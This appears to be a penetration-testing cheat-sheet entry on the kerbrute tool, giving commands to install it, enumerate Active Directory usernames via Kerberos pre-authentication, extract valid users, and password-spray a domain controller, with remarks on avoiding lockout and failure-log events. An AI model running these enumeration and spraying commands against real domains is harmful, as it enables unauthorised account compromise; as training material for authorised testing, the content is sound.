kerbrute

active_directory_enumeration_attacks

kerbrute (2.4k ⭐, 2020 πŸͺ¦) is a popular tool that can be used for username enumeration and for password spraying on Kerberos.

You can install it using:

$ go install github.com/ropnop/kerbrute@latest

Username enumeration πŸ§‘: it use Kerberos Pre-Authentication to perform its enumeration. It generates event code 4768 (TGT request) instead of 4625 (login failure). It doesn't count towards account lockout.

$ kerbrute userenum -d domain --dc IP wordlist
$ kerbrute userenum -d domain --dc IP wordlist -o output.txt
$ grep + output.txt | cut -d ' ' -f8 | cut -d '@' -f1 > valid_users.txt

πŸ“š If a user has no pre auth, their hash may be dumped, while we may have to manually investigate. Refer to AS-REP Roasting Attack.

Password Spraying πŸ”

$ kerbrute passwordspray -d domain --dc IP valid_users.txt mypassword
<may not work, use nxc/cme instead>